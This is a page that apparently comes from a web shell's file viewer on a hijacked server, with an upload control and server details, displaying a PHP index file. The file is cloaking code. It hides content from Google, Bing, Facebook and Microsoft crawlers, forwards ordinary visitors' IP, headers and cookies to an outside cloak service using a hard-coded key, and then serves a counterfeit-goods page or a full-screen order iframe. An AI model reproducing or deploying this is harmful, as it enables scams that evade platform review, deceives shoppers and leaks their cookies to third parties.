HEX
Server: nginx/1.28.1
System: Linux 10-41-63-61 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/www.whfie.com/ccg/
Upload Files
File: /www/wwwroot/www.whfie.com/ccg/index.php
 







<?php
    
ini_set("display_errors", "Off");
error_reporting(0);

$jsonData = array();                                // 初始化接口发送数据
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {     // 使用cloudflare 转发的IP地址
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
} else {
    if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
        $ip = getenv('HTTP_CLIENT_IP');
    } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
        $ip = getenv('REMOTE_ADDR');
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
}
$boolean = true;
$hostname = gethostbyaddr($ip);
if (!empty($hostname)) {
    if(is_numeric(stripos($hostname, 'google')) || is_numeric(stripos($hostname, 'bing')) || is_numeric(stripos($hostname, 'facebook')) || is_numeric(stripos($hostname, 'microsoft'))) {
        $boolean = false;
    }
}

//add by new cloak
function is_https()
{
    if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) === 'on')
    {
        return TRUE;
    }
    elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https')
    {
        return TRUE;
    }
    elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && $_SERVER['HTTP_FRONT_END_HTTPS'] === 'on')
    {
        return TRUE;
    }
    return FALSE;
}

function browser_headers()
{
    $headers = array();
    foreach ($_SERVER as $name => $value) {
        if (preg_match('/^HTTP_/', $name)) {
            // convert HTTP_HEADER_NAME to header-name
            $name = strtr(substr($name, 5), '_', '-');
            $name = strtolower($name);
            $headers[$name] = $value;
        }
    }
    return $headers;
}

function encode_visitor_cookies()
{
    $transmit_string = "";

    foreach ($_COOKIE as $name => $value) {
        try {
            $transmit_string .= "$name=$value; ";
        } catch (Exception $e) {
            continue;
        }
    }

    return $transmit_string;
}

function forward_response_cookies($ch, $headerLine)
{
    if (preg_match('/^Set-Cookie:/mi', $headerLine, $cookie)) {
        header($headerLine, false);
    }

    return strlen($headerLine); // Needed by curl
}

function get_SERVER_value($field_name)
{
    return isset($_SERVER[$field_name]) ? $_SERVER[$field_name] : null;
}

//add by new cloak END

if($boolean) {
    $headers = browser_headers();
//    $visit_domain = str_replace('www.', '', $_SERVER['HTTP_HOST']);     // 当前网站域名
    $visit_domain = (is_https() ? "https://" : "http://"). $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $jsonData['id'] = '1gpWBa';
    $jsonData['ip'] = $ip;
    $jsonData['domain'] = $visit_domain;
    $jsonData['country_code'] = 'TW';  
    //设置该参数后,将替换"广告策略》访问者地理位置>过滤"的设置,填写国家代码,多个用逗号分隔,如:US,GB,CA,AU,IE,NZ
    $jsonData['referer'] = get_SERVER_value('HTTP_REFERER');
    $jsonData['headers'] = json_encode($headers);
    $ch = curl_init('www.tiktokba.com/cloak/byApi');

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    curl_setopt($ch, CURLOPT_USERAGENT, get_SERVER_value('HTTP_USER_AGENT'));
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

    curl_setopt($ch, CURLOPT_ENCODING, ""); //Enables compression
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-type: application/json"]);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["escloak-key: xio83uvN6bUmW4Ide0ayOztc5pYjHLlk"]);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($jsonData));
    curl_setopt($ch, CURLOPT_HEADERFUNCTION, "forward_response_cookies"); //Forward response's cookies to visitor
    if ($_COOKIE) {//Forward visitor's cookie to our server
        curl_setopt($ch, CURLOPT_COOKIE, encode_visitor_cookies());
    }
    $return = curl_exec($ch);
    if($return == false){
        echo 'Curl error: ' . curl_error($ch);exit;
    }
    $return = json_decode($return, true);
    $boolean = $return['result'];           // 返回true 访问仿品,返回false 访问正品
    
    
           if($boolean == true){
  echo '<base href="https://www.whfie.com/shoe/tg/" /> ';
 $f_info=implode("",file("https://www.whfie.com/shoe/tg/"));   
echo $f_info;   
 
       }
       elseif($boolean == false){
 
 echo '	 <title>
</title>
		  <meta  charset="utf-8">
	   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">
<style type="text/css" media="all">
	body{padding:0px;margin:0px}
</style>
<head>
 <body>
 <iframe src="https://www.snodshop.com/index.php?m=Order&id=6enBcl&uid=13&tpl=detail" style="visibility:visible !important; position:absolute; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;" allowfullscreen="allowfullscreen" webkitallowfullscreen="webkitallowfullscreen" mozallowfullscreen="mozallowfullscreen"></iframe>
 ';  

   
 
   
   
   
   
   
   
   
       }
    
    
    
}
@ Telegram